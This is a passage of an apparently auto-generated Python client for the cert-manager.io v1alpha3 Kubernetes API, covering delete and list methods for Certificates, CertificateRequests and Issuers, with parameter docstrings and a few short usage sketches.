auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_issuer(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_issuer # noqa: E501
delete collection of Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_issuer(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure it sees all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_collection_namespaced_issuer_with_http_info(namespace, **kwargs) # noqa: E501
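
# Sketch: bound this request client-side with a (connection, read) timeout
# pair, as described by _request_timeout above:
#
#   api.delete_collection_namespaced_issuer(
#       namespace="default",
#       _request_timeout=(3.05, 27),
#   )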
def delete_collection_namespaced_issuer_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_issuer # noqa: E501
delete collection of Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_issuer_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart its list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error; the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent with the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (up to zero items) in the event all requested objects are filtered out, and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure it sees all possible objects. If objects are updated during a chunked list, the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _return_http_data_only: if True, return only the response data,
without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
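A hedged sketch of a filtered bulk delete (assumes `api` is an instance of this API class built from a configured ApiClient; the namespace and label are illustrative):
>>> # deletes every Issuer in 'default' carrying the label team=payments
>>> status, code, headers = api.delete_collection_namespaced_issuer_with_http_info(
...     'default', label_selector='team=payments')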
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_certificate(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_certificate # noqa: E501
delete a Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_certificate(name, namespace, async_req=True)
>>> result = thread.get()
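A hedged synchronous sketch (assumes `api` is an instance of this API class built from a configured ApiClient; the certificate and namespace names are illustrative):
>>> # delete immediately and cascade to dependents in the foreground
>>> status = api.delete_namespaced_certificate(
...     'my-cert', 'default',
...     grace_period_seconds=0,
...     propagation_policy='Foreground')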
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified.
:param bool orphan_dependents: Deprecated: please use PropagationPolicy; this field will be deprecated in 1.7. Whether the dependent objects should be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_namespaced_certificate_with_http_info(name, namespace, **kwargs) # noqa: E501
def delete_namespaced_certificate_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_certificate # noqa: E501
delete a Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_certificate_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified.
:param bool orphan_dependents: Deprecated: please use PropagationPolicy; this field will be deprecated in 1.7. Whether the dependent objects should be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _return_http_data_only: response data only, without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'dry_run',
'grace_period_seconds',
'orphan_dependents',
'propagation_policy',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_namespaced_certificate`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'grace_period_seconds' in local_var_params and local_var_params['grace_period_seconds'] is not None: # noqa: E501
query_params.append(('gracePeriodSeconds', local_var_params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in local_var_params and local_var_params['orphan_dependents'] is not None: # noqa: E501
query_params.append(('orphanDependents', local_var_params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in local_var_params and local_var_params['propagation_policy'] is not None: # noqa: E501
query_params.append(('propagationPolicy', local_var_params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_certificate_request(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_certificate_request # noqa: E501
delete a CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_certificate_request(name, namespace, async_req=True)
>>> result = thread.get()
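A hedged dry-run sketch (assumes `api` is an instance of this API class; the object names are illustrative):
>>> # dry_run='All' validates the delete without persisting any change
>>> status = api.delete_namespaced_certificate_request(
...     'my-csr', 'default', dry_run='All')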
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified.
:param bool orphan_dependents: Deprecated: please use PropagationPolicy; this field will be deprecated in 1.7. Whether the dependent objects should be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_namespaced_certificate_request_with_http_info(name, namespace, **kwargs) # noqa: E501
def delete_namespaced_certificate_request_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_certificate_request # noqa: E501
delete a CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_certificate_request_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified.
:param bool orphan_dependents: Deprecated: please use PropagationPolicy; this field will be deprecated in 1.7. Whether the dependent objects should be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _return_http_data_only: response data only, without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'dry_run',
'grace_period_seconds',
'orphan_dependents',
'propagation_policy',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'grace_period_seconds' in local_var_params and local_var_params['grace_period_seconds'] is not None: # noqa: E501
query_params.append(('gracePeriodSeconds', local_var_params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in local_var_params and local_var_params['orphan_dependents'] is not None: # noqa: E501
query_params.append(('orphanDependents', local_var_params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in local_var_params and local_var_params['propagation_policy'] is not None: # noqa: E501
query_params.append(('propagationPolicy', local_var_params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_issuer(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_issuer # noqa: E501
delete an Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_issuer(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified.
:param bool orphan_dependents: Deprecated: please use PropagationPolicy; this field will be deprecated in 1.7. Whether the dependent objects should be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_namespaced_issuer_with_http_info(name, namespace, **kwargs) # noqa: E501
def delete_namespaced_issuer_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_issuer # noqa: E501
delete an Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_issuer_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be a non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified.
:param bool orphan_dependents: Deprecated: please use PropagationPolicy; this field will be deprecated in 1.7. Whether the dependent objects should be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _return_http_data_only: response data only, without the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'dry_run',
'grace_period_seconds',
'orphan_dependents',
'propagation_policy',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_namespaced_issuer`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'grace_period_seconds' in local_var_params and local_var_params['grace_period_seconds'] is not None: # noqa: E501
query_params.append(('gracePeriodSeconds', local_var_params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in local_var_params and local_var_params['orphan_dependents'] is not None: # noqa: E501
query_params.append(('orphanDependents', local_var_params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in local_var_params and local_var_params['propagation_policy'] is not None: # noqa: E501
query_params.append(('propagationPolicy', local_var_params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_certificate_for_all_namespaces(self, **kwargs): # noqa: E501
"""list_certificate_for_all_namespaces # noqa: E501
list objects of kind Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_certificate_for_all_namespaces(async_req=True)
>>> result = thread.get()
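A hedged pagination sketch using limit/_continue chunking (assumes `api` is an instance of this API class; the continue token is read from the list metadata of the generated model):
>>> certs, token = [], None
>>> while True:
...     page = api.list_certificate_for_all_namespaces(limit=100, _continue=token)
...     certs.extend(page.items)
...     token = page.metadata._continue  # V1ListMeta exposes the token as _continue (assumed)
...     if not token:
...         break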
